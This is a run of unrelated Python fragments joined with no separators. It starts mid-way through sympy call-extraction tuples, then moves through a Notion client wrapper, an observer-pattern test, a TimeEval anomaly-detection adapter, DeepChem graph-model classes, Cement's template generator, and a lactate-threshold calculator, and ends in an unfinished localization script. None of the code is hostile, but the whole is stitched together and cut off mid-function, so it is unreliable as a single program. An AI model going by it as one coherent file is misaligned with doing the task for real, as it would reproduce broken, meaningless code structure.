pi, asin, together, root, S\n'), ((2932, 2943), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2940, 2943), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3684, 3690), 'sympy.sin', 'sin', (['(2)'], {}), '(2)\n', (3687, 3690), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4315, 4329), 'sympy.Rational', 'Rational', (['(1)', '(4)'], {}), '(1, 4)\n', (4323, 4329), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4688, 4694), 'sympy.sin', 'sin', (['a'], {}), '(a)\n', (4691, 4694), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4957, 4972), 'sympy.Rational', 'Rational', (['(1)', '(12)'], {}), '(1, 12)\n', (4965, 4972), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((716, 727), 'sympy.sqrt', 'sqrt', (['(x + 1)'], {}), '(x + 1)\n', (720, 727), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((730, 737), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (734, 737), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1308, 1324), 'sympy.sqrt', 'sqrt', (['(x ** 4 + 1)'], {}), '(x ** 4 + 1)\n', (1312, 1324), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1559, 1566), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1563, 1566), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2596, 2603), 'sympy.sqrt', 'sqrt', (['a'], {}), '(a)\n', (2600, 2603), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2782, 2806), 'sympy.sqrt', 'sqrt', (['(x ** 2 - 5 * x + 6)'], {}), '(x ** 2 - 5 * x + 6)\n', (2786, 2806), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3249, 3255), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (3252, 3255), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3302, 3312), 'sympy.sin', 'sin', (['(1 / x)'], {}), '(1 / x)\n', (3305, 3312), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3663, 3669), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (3666, 3669), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3720, 3730), 'sympy.sin', 'sin', (['(3 * x)'], {}), '(3 * x)\n', (3723, 3730), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3771, 3781), 'sympy.sin', 'sin', (['(5 * x)'], {}), '(5 * x)\n', (3774, 3781), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3784, 3794), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (3787, 3794), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3844, 3855), 'sympy.sin', 'sin', (['(pi * x)'], {}), '(pi * x)\n', (3847, 3855), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3858, 3873), 'sympy.sin', 'sin', (['(3 * pi * x)'], {}), '(3 * pi * x)\n', (3861, 3873), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3927, 3938), 'sympy.sin', 'sin', (['(pi / x)'], {}), '(pi / x)\n', (3930, 3938), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4044, 4054), 'sympy.sin', 'sin', (['(1 / x)'], {}), '(1 / x)\n', (4047, 4054), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((5066, 5077), 'sympy.asin', 'asin', (['(a * x)'], {}), '(a * x)\n', (5070, 5077), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2049, 2060), 'sympy.sqrt', 'sqrt', (['(1 + x)'], {}), '(1 + x)\n', (2053, 2060), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2149, 2156), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2153, 2156), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2223, 2230), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2227, 2230), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2548, 2555), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2552, 2555), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2558, 2565), 'sympy.sqrt', 'sqrt', (['a'], {}), '(a)\n', (2562, 2565), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2635, 2642), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (2639, 2642), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2715, 2726), 'sympy.sqrt', 'sqrt', (['(1 + x)'], {}), '(1 + x)\n', (2719, 2726), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2729, 2740), 'sympy.sqrt', 'sqrt', (['(1 - x)'], {}), '(1 - x)\n', (2733, 2740), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2899, 2915), 'sympy.sqrt', 'sqrt', (['(x ** 2 + 1)'], {}), '(x ** 2 + 1)\n', (2903, 2915), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3387, 3397), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (3390, 3397), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3982, 3988), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (3985, 3988), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4094, 4104), 'sympy.cos', 'cos', (['(m * x)'], {}), '(m * x)\n', (4097, 4104), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4107, 4117), 'sympy.cos', 'cos', (['(n * x)'], {}), '(n * x)\n', (4110, 4117), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4201, 4207), 'sympy.tan', 'tan', (['x'], {}), '(x)\n', (4204, 4207), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4210, 4216), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4213, 4216), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4273, 4283), 'sympy.sin', 'sin', (['(2 * x)'], {}), '(2 * x)\n', (4276, 4283), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4292, 4302), 'sympy.sin', 'sin', (['(3 * x)'], {}), '(3 * x)\n', (4295, 4302), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4575, 4581), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4578, 4581), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4584, 4590), 'sympy.sin', 'sin', (['a'], {}), '(a)\n', (4587, 4590), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4650, 4656), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4653, 4656), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4659, 4665), 'sympy.cos', 'cos', (['a'], {}), '(a)\n', (4662, 4665), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4720, 4730), 'sympy.sin', 'sin', (['(x + h)'], {}), '(x + h)\n', (4723, 4730), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4733, 4739), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4736, 4739), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4933, 4939), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4936, 4939), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1447, 1454), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1451, 1454), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3118, 3124), 'sympy.exp', 'exp', (['x'], {}), '(x)\n', (3121, 3124), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3177, 3183), 'sympy.exp', 'exp', (['x'], {}), '(x)\n', (3180, 3183), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4364, 4370), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4367, 4370), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4905, 4911), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4908, 4911), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4921, 4927), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4924, 4927), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4441, 4447), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4444, 4447), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4460, 4466), 'sympy.sin', 'sin', (['x'], {}), '(x)\n', (4463, 4466), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1587, 1594), 'sympy.sqrt', 'sqrt', (['x'], {}), '(x)\n', (1591, 1594), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((358, 364), 'sympy.log', 'log', (['(3)'], {}), '(3)\n', (361, 364), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((367, 373), 'sympy.log', 'log', (['(2)'], {}), '(2)\n', (370, 373), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n')] |
from notion.client import NotionClient
from notion.settings import Settings
class Context:
def __init__(self):
self.settings = Settings.from_file()
self._client = None
def get_client(self):
if not self._client:
self.settings.validate()
self._client = NotionClient(token_v2=self.settings.token, monitor=False)
return self._client
def update_settings(self, **kwargs):
self.settings = self.settings.update(**kwargs)
| [
"notion.settings.Settings.from_file",
"notion.client.NotionClient"
]
| [((141, 161), 'notion.settings.Settings.from_file', 'Settings.from_file', ([], {}), '()\n', (159, 161), False, 'from notion.settings import Settings\n'), ((310, 367), 'notion.client.NotionClient', 'NotionClient', ([], {'token_v2': 'self.settings.token', 'monitor': '(False)'}), '(token_v2=self.settings.token, monitor=False)\n', (322, 367), False, 'from notion.client import NotionClient\n')] |
import unittest
from Observers import Observer, ObserverMailServer, ObserverPbx
from Subjects import Subject, SubjectEflow
class UtVisitor(unittest.TestCase):
def test_observer(self):
# Create observers
pbx = ObserverPbx()
ms = ObserverMailServer()
# Create subject
subject = SubjectEflow()
subject.attach(pbx)
subject.attach(ms)
# Notify when JB is leave of absence
subject.notify("JB", "Hachi")
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"Observers.ObserverMailServer",
"Subjects.SubjectEflow",
"Observers.ObserverPbx"
]
| [((567, 582), 'unittest.main', 'unittest.main', ([], {}), '()\n', (580, 582), False, 'import unittest\n'), ((233, 246), 'Observers.ObserverPbx', 'ObserverPbx', ([], {}), '()\n', (244, 246), False, 'from Observers import Observer, ObserverMailServer, ObserverPbx\n'), ((260, 280), 'Observers.ObserverMailServer', 'ObserverMailServer', ([], {}), '()\n', (278, 280), False, 'from Observers import Observer, ObserverMailServer, ObserverPbx\n'), ((337, 351), 'Subjects.SubjectEflow', 'SubjectEflow', ([], {}), '()\n', (349, 351), False, 'from Subjects import Subject, SubjectEflow\n')] |
from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_eif_parameters: Dict[str, Dict[str, Any]] = {
"extension_level": {
"defaultValue": None,
"description": "Extension level 0 resembles standard isolation forest. If unspecified (`None`), then `extension_level=X.shape[1] - 1`.",
"name": "extension_level",
"type": "int"
},
"limit": {
"defaultValue": None,
"description": "The maximum allowed tree depth. This is by default set to average length of unsucessful search in a binary tree.",
"name": "limit",
"type": "int"
},
"max_samples": {
"defaultValue": None,
"description": "The number of samples to draw from X to train each base estimator: `max_samples * X.shape[0]`. If unspecified (`None`), then `max_samples=min(256, X.shape[0])`.",
"name": "max_samples",
"type": "float"
},
"n_trees": {
"defaultValue": 200,
"description": "The number of decision trees (base estimators) in the forest (ensemble).",
"name": "n_trees",
"type": "int"
},
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def eif(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="Extended Isolation Forest (EIF)",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/eif",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_eif_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| [
"timeeval.adapters.DockerAdapter",
"timeeval.params.ParameterConfig.defaults",
"timeeval.InputDimensionality"
]
| [((1500, 1631), 'timeeval.adapters.DockerAdapter', 'DockerAdapter', ([], {'image_name': '"""registry.gitlab.hpi.de/akita/i/eif"""', 'skip_pull': 'skip_pull', 'timeout': 'timeout', 'group_privileges': '"""akita"""'}), "(image_name='registry.gitlab.hpi.de/akita/i/eif', skip_pull=\n skip_pull, timeout=timeout, group_privileges='akita')\n", (1513, 1631), False, 'from timeeval.adapters import DockerAdapter\n'), ((1940, 1975), 'timeeval.InputDimensionality', 'InputDimensionality', (['"""multivariate"""'], {}), "('multivariate')\n", (1959, 1975), False, 'from timeeval import Algorithm, TrainingType, InputDimensionality\n'), ((1807, 1833), 'timeeval.params.ParameterConfig.defaults', 'ParameterConfig.defaults', ([], {}), '()\n', (1831, 1833), False, 'from timeeval.params import ParameterConfig\n')] |
"""
Convenience classes for assembling graph models.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import tensorflow as tf
from deepchem.nn.layers import GraphGather
from deepchem.models.tf_new_models.graph_topology import GraphTopology
class SequentialGraph(object):
"""An analog of Keras Sequential class for Graph data.
Like the Sequential class from Keras, but automatically passes topology
placeholders from GraphTopology to each graph layer (from layers) added
to the network. Non graph layers don't get the extra placeholders.
"""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of features per atom.
"""
self.graph = tf.Graph()
with self.graph.as_default():
self.graph_topology = GraphTopology(n_feat)
self.output = self.graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
def add(self, layer):
"""Adds a new layer to model."""
with self.graph.as_default():
############################################# DEBUG
#print("start - add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# For graphical layers, add connectivity placeholders
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
if (len(self.layers) > 0 and hasattr(self.layers[-1], "__name__")):
assert self.layers[-1].__name__ != "GraphGather", \
'Cannot use GraphConv or GraphGather layers after a GraphGather'
self.output = layer([self.output] +
self.graph_topology.get_topology_placeholders())
else:
self.output = layer(self.output)
############################################# DEBUG
#print("end- add()")
#print("self.output")
#print(self.output)
############################################# DEBUG
# Add layer to the layer list
self.layers.append(layer)
def get_graph_topology(self):
return self.graph_topology
def get_num_output_features(self):
"""Gets the output shape of the featurization layers of the network"""
return self.layers[-1].output_shape[1]
def return_outputs(self):
return self.output
def return_inputs(self):
return self.graph_topology.get_input_placeholders()
def get_layer(self, layer_id):
return self.layers[layer_id]
class SequentialSupportGraph(object):
"""An analog of Keras Sequential model for test/support models."""
def __init__(self, n_feat):
"""
Parameters
----------
n_feat: int
Number of atomic features.
"""
self.graph = tf.Graph()
with self.graph.as_default():
# Create graph topology and x
self.test_graph_topology = GraphTopology(n_feat, name='test')
self.support_graph_topology = GraphTopology(n_feat, name='support')
self.test = self.test_graph_topology.get_atom_features_placeholder()
self.support = self.support_graph_topology.get_atom_features_placeholder()
# Keep track of the layers
self.layers = []
# Whether or not we have used the GraphGather layer yet
self.bool_pre_gather = True
def add(self, layer):
"""Adds a layer to both test/support stacks.
Note that the layer transformation is performed independently on the
test/support tensors.
"""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphGather', 'GraphPool']:
assert self.bool_pre_gather, "Cannot apply graphical layers after gather."
self.test = layer([self.test] + self.test_graph_topology.topology)
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.test = layer(self.test)
self.support = layer(self.support)
if type(layer).__name__ == 'GraphGather':
self.bool_pre_gather = False # Set flag to stop adding topology
def add_test(self, layer):
"""Adds a layer to test."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.test = layer([self.test] + self.test_graph_topology.topology)
else:
self.test = layer(self.test)
def add_support(self, layer):
"""Adds a layer to support."""
with self.graph.as_default():
self.layers.append(layer)
# Update new value of x
if type(layer).__name__ in ['GraphConv', 'GraphPool', 'GraphGather']:
self.support = layer([self.support] +
self.support_graph_topology.topology)
else:
self.support = layer(self.support)
def join(self, layer):
"""Joins test and support to a two input two output layer"""
with self.graph.as_default():
self.layers.append(layer)
self.test, self.support = layer([self.test, self.support])
def get_test_output(self):
return self.test
def get_support_output(self):
return self.support
def return_outputs(self):
return [self.test] + [self.support]
def return_inputs(self):
return (self.test_graph_topology.get_inputs() +
self.support_graph_topology.get_inputs())
| [
"tensorflow.Graph",
"deepchem.models.tf_new_models.graph_topology.GraphTopology"
]
| [((874, 884), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (882, 884), True, 'import tensorflow as tf\n'), ((2863, 2873), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2871, 2873), True, 'import tensorflow as tf\n'), ((947, 968), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {}), '(n_feat)\n', (960, 968), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n'), ((2977, 3011), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {'name': '"""test"""'}), "(n_feat, name='test')\n", (2990, 3011), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n'), ((3048, 3085), 'deepchem.models.tf_new_models.graph_topology.GraphTopology', 'GraphTopology', (['n_feat'], {'name': '"""support"""'}), "(n_feat, name='support')\n", (3061, 3085), False, 'from deepchem.models.tf_new_models.graph_topology import GraphTopology\n')] |
"""
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
msg = 'unable to load template module' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
| [
"os.path.exists",
"os.listdir",
"os.path.join",
"re.match",
"inspect.getfile",
"shutil.copytree",
"shutil.rmtree"
]
| [((3977, 4006), 'shutil.copytree', 'shutil.copytree', (['source', 'dest'], {}), '(source, dest)\n', (3992, 4006), False, 'import shutil\n'), ((4414, 4444), 'os.path.join', 'os.path.join', (['path', '"""generate"""'], {}), "(path, 'generate')\n", (4426, 4444), False, 'import os\n'), ((5491, 5507), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (5501, 5507), False, 'import os\n'), ((868, 905), 'os.path.join', 'os.path.join', (['source', '""".generate.yml"""'], {}), "(source, '.generate.yml')\n", (880, 905), False, 'import os\n'), ((3730, 3750), 'os.path.exists', 'os.path.exists', (['dest'], {}), '(dest)\n', (3744, 3750), False, 'import os\n'), ((3797, 3816), 'shutil.rmtree', 'shutil.rmtree', (['dest'], {}), '(dest)\n', (3810, 3816), False, 'import shutil\n'), ((3830, 3850), 'os.path.exists', 'os.path.exists', (['dest'], {}), '(dest)\n', (3844, 3850), False, 'import os\n'), ((4456, 4479), 'os.path.exists', 'os.path.exists', (['subpath'], {}), '(subpath)\n', (4470, 4479), False, 'import os\n'), ((4917, 4951), 'os.path.join', 'os.path.join', (['mod_path', '"""generate"""'], {}), "(mod_path, 'generate')\n", (4929, 4951), False, 'import os\n'), ((2904, 2934), 're.match', 're.match', (["var['validate']", 'val'], {}), "(var['validate'], val)\n", (2912, 2934), False, 'import re\n'), ((3346, 3391), 're.match', 're.match', (['"""(.*)already exists(.*)"""', 'e.args[0]'], {}), "('(.*)already exists(.*)', e.args[0])\n", (3354, 3391), False, 'import re\n'), ((4873, 4893), 'inspect.getfile', 'inspect.getfile', (['mod'], {}), '(mod)\n', (4888, 4893), False, 'import inspect\n'), ((4968, 4991), 'os.path.exists', 'os.path.exists', (['subpath'], {}), '(subpath)\n', (4982, 4991), False, 'import os\n'), ((7027, 7051), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (7039, 7051), False, 'import os\n')] |
from .gpxfile import get_hr_measurements
from .utils import interpolate
from operator import itemgetter
def __calculate_moving_sums(points, window):
""" Calculates hr moving sums of the window len """
time, hrs = zip(*points)
moving_sum = sum(hrs[0:window])
sums = [(time[0], moving_sum)]
for i, t in enumerate(time[1:-1 * window]):
moving_sum += hrs[i + window] - hrs[i]
sums.append((t, moving_sum))
return sums
def calculate_lactate_threshold(hrdata):
""" Given list of (time, hr), returns lactate threshold and selected data"""
test_period = 60 * 30 # test time
measured_period = 60 * 20 # measured period in seconds
hrs = interpolate(hrdata)
time_stamp, max_sum = max(__calculate_moving_sums(hrs, test_period),
key=itemgetter(1))
# your lactate threshold is average of last 20 in 30 minutes of tempo run
start_measure = time_stamp + (test_period - measured_period)
stop_measure = start_measure + measured_period
measured_time, measured_hrs = zip(*hrs[start_measure:stop_measure])
lactate_thr = round(sum(measured_hrs) / measured_period)
return (lactate_thr, measured_time, measured_hrs)
| [
"operator.itemgetter"
]
| [((819, 832), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (829, 832), False, 'from operator import itemgetter\n')] |
#! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import xml.etree.ElementTree as ET
import os
import sys
import shutil
import atexit
import subprocess
# Use the project root as the working directory
prevdir = os.getcwd()
workdir = os.path.join(os.path.dirname(__file__), '..', '..')
os.chdir(workdir)
atexit.register(os.chdir, prevdir)
# Include only locales above this threshold (e.g. 70%) in production
l10n_threshold = 0.70
parser = argparse.ArgumentParser()
parser.add_argument(
'-m', '--macos', default=False, action="store_true", dest="ismacos",
help='Include the MacOS bundle data')
parser.add_argument(
'-q', '--qt_path', default=None, dest="qtpath",
help='The QT binary path. If not set, we try to guess.')
args = parser.parse_args()
stepnum = 1
def title(text):
